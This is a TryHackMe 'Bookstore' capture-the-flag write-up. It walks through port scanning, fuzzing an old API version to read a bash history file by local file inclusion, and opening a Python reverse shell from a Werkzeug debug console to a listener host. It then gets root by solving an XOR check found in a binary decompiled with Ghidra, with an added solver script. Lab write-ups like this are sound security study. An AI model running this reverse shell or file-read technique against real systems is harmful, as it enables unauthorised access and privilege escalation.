THM – Bookstore Writeup

This Try Hack Me room really caught my interest, mainly because the title and brief gave nothing away!

Looking back on this room, I wouldn’t really class it as a beginner room, but it is a good test nonetheless!

Brief

The brief on this was literally just user and root flags, so nothing really to go on here.

Try Hack Me didn’t give much away!

Starting out and Enumeration

I started out with an nmap scan

nmap -sV -sC -oN ./nmap/initial 10.10.85.253

This gave me the results below

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Book Store
5000/tcp open  http    Werkzeug httpd 0.14.1 (Python 3.6.9)
| http-robots.txt: 1 disallowed entry
|_/api
|_http-server-header: Werkzeug/0.14.1 Python/3.6.9
|_http-title: Home

The Website on port 80

I decided to start off with this website, so I ran the gobuster command below

gobuster dir -u 10.10.85.253 -w /usr/share/wordlists/dirbuster/big.txt

I got the following results, which were not that useful

/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/assets (Status: 301)
/favicon.ico (Status: 200)
/images (Status: 301)
/javascript (Status: 301)
/server-status (Status: 403)

I then found the login page below and tried to see what happened when I logged in

[Screenshot: login page on port 80]

I couldn’t see anything where the username and password got any sort of logical response from the site, so I checked the source code and found the following note:

<!--Still Working on this page will add the backend support soon, also the debugger pin is inside sid's bash history file -->

That explains why the login page didn’t work properly, and it also gave me a goal: I am looking for a debugger, and the PIN for it is in sid’s bash history.

I considered at this point using hydra against the SSH server with the username sid, but decided to check the site nmap found on port 5000 first.

Werkzeug

I found this site on port 5000

[Screenshot: site on port 5000]

I decided to scan this with the gobuster command below

gobuster dir -u http://10.10.85.253:5000 -w /usr/share/wordlists/dirbuster/big.txt

The results were

/api (Status: 200)
/console (Status: 200)
/robots.txt (Status: 200)

The API page looked like this:

[Screenshot: /api page]

With the console page looking like this:

[Screenshot: /console page]

Fuzzing, Research then more fuzzing!

Since the API page listed some routes and I knew I was looking for sid’s bash history, I decided to fuzz the query parameter name with:

wfuzz -u http://10.10.85.253:5000/api/v2/resources/books?FUZZ=.bash_history -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404

And I got the results below

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000000486:   200        1 L      1 W      3 Ch        "author"
000000529:   200        1 L      1 W      3 Ch        "id"
000011548:   200        1 L      1 W      3 Ch        "published"

I already knew these from the API page!

I was sure the answer to this was some kind of LFI, but fuzzing wasn’t finding anything I could use against it.

I decided to check out the Werkzeug changelog and found there have been 11 security updates up to their present version. At this point I was wondering if an older version of the API was still present, so I changed my command slightly to:

wfuzz -u http://10.10.85.253:5000/api/v1/resources/books?FUZZ=.bash_history -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404

And I got the following results:

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000000395:   200        7 L      11 W     116 Ch      XXXXXX
000000486:   200        1 L      1 W      3 Ch        "author"
000000529:   200        1 L      1 W      3 Ch        "id"
000011548:   200        1 L      1 W      3 Ch        "published"

I’ve cleared out the parameter name it found, but it got me the one I needed straight away, and I was able to use the request below to get sid’s bash history and log into the console:

http://10.10.85.253:5000/api/v1/resources/books?XXXXX=.bash_history

[Screenshot: sid’s bash history returned by the API]

Getting a shell

Since this said it was a Python shell, I set up a listener on my machine using

nc -lvnp 9003

And then ran the command below in the debug console

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("MY_IP",9003));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

This worked and I had my reverse shell. Listing the home directory, I found the first flag and another interesting file...

[Screenshot: home directory listing]

I wasn’t sure if the try-harder executable was a joke or not, but decided to look into it further!

I need to try harder!

To run this, I first had to upgrade my shell with:

python3 -c "import pty;pty.spawn('/bin/bash')"

When I ran the try-harder file, it wanted a magic number before it would do whatever it was going to do. I tried a couple of guesses but decided to pull the file down and see what I could find.

I set up an HTTP server on the target machine with

python3 -m http.server

and then on my machine used

wget http://10.10.85.253:8000/try-harder

Using Ghidra I found the bit I was most interested in:

[Screenshot: Ghidra decompilation of try-harder]

The bit that evaluates the number is:

local_18 = 0x5db3;                          /* second XOR key, set just before the prompt */
puts("What\'s The Magic Number?!");
__isoc99_scanf(&DAT_001008ee,&local_1c);    /* reads the user's number into local_1c */
local_14 = local_1c ^ 0x1116 ^ local_18;    /* XOR the input with both constants */
if (local_14 == 0x5dcd21f4) {               /* only this result reaches the shell */
  system("/bin/bash -p");
}

As this is an XOR operation we can absolutely work this out! In the code it’s evaluating:

local_14 = local_1c ^ 0x1116 ^ local_18

From the Ghidra output we know local_14 and local_18; it’s local_1c we don’t know. Because XOR is its own inverse (a ^ k ^ k == a), we can rearrange this to:

local_1c = local_14 ^ 0x1116 ^ local_18

Now putting in the known values;

local_1c = 0x5dcd21f4 ^ 0x1116 ^ 0x5db3

Now, I know this can look confusing: our objective was to get a magic number and I’ve just created a maths problem!

All we need to do to get the actual number is open an empty console window, start python3 and type:

0x5dcd21f4 ^ 0x1116 ^ 0x5db3

This will give you the magic number!!
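As an added example (not part of the original writeup), the Python below reproduces the decompiled check and derives the number the same way, using only the constants from the Ghidra output above (0x1116, 0x5db3, 0x5dcd21f4). It also generalises the trick to an XOR chain of any length and handles a case this binary doesn’t hit: if the derived value had its top bit set, the number typed at the prompt would have to be the negative two’s-complement form, since scanf reads into a C int (the format string is assumed to be a signed decimal; the page doesn’t show it). Function names here are my own.

```python
"""Added example, not from the original writeup: recover the input that
satisfies the XOR check decompiled from try-harder, and confirm it passes."""

MASK32 = 0xFFFFFFFF  # the binary compares 32-bit ints, so keep every result in 32 bits

# Values read from the decompiled check shown on the page
KEY_CONST = 0x1116      # literal XOR'd into the user's input
LOCAL_18 = 0x5DB3       # local_18, assigned just before the prompt
TARGET = 0x5DCD21F4     # value local_14 must equal to reach system("/bin/bash -p")


def check(magic, key=KEY_CONST, local_18=LOCAL_18, target=TARGET):
    """Mirror of the decompiled branch:
        local_14 = local_1c ^ 0x1116 ^ local_18;  if (local_14 == 0x5dcd21f4) ...
    Returns True when the supplied number would pass the check."""
    local_14 = (magic ^ key ^ local_18) & MASK32
    return local_14 == target


def solve_xor_chain(target, constants):
    """General form of the rearrangement used on the page: if
        target == x ^ c1 ^ c2 ^ ... ^ cn
    then, because a ^ k ^ k == a, the unknown x is target ^ c1 ^ ... ^ cn.
    The chain may be any length; XOR is a bijection, so the answer is unique."""
    x = target & MASK32
    for c in constants:
        x ^= c & MASK32
    return x


def derive_magic():
    """The specific instance from the writeup: local_1c = 0x5dcd21f4 ^ 0x1116 ^ 0x5db3."""
    return solve_xor_chain(TARGET, [KEY_CONST, LOCAL_18])


def as_c_int(value):
    """scanf stores the number in a C int (assumed signed 32-bit decimal). If the
    derived value has its top bit set, the decimal the user must type is the
    two's-complement (negative) form; this converts to that form."""
    value &= MASK32
    return value - (1 << 32) if value & 0x80000000 else value


if __name__ == "__main__":
    magic = derive_magic()
    print("derived value   : 0x%08x" % magic)
    print("type into prompt:", as_c_int(magic))
    print("passes the check:", check(magic))
```

Running it prints the derived value in hex, the decimal to type at the prompt, and confirms that feeding that value back through the mirrored check succeeds; swap in different constants to solve any other XOR-style check of the same shape.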

Go back to your reverse shell (or connect again if you pressed ctrl+c like I did...)

Run the try-harder executable again and enter the magic number; this will give you root access.

Then change into the root directory and you have the final flag!!

[Screenshot: root flag]

Conclusion

I really enjoyed this box from Try Hack Me! It was a good challenge, and I liked that it required some use of Ghidra for disassembling; it’s not something you come across a lot in THM, but it was really good practice.

If you want to try this for yourself, visit the room on Try Hack Me.

Marc